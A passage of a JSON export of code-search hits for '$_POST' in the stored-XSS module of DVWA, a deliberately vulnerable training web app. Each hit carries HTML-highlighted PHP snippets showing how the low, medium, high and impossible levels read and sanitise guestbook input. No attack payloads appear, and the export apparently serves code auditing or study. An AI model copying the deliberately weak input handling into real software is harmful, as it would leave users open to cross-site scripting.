operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 296,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">strip_tags</span><span class=\"token punctuation\">(</span> <span class=\"token function\">addslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 298,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 299,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 300,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 304,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 305,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 306,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> ",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 308,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 309,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'btnSign'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'mtxMessage'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'txtName'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitize message input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$message</span> <span class=\"token operator\">=</span> <span class=\"token function\">strip_tags</span><span class=\"token punctuation\">(</span> <span class=\"token function\">addslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$message</span> <span class=\"token punctuation\">)</span> <span class=\"token 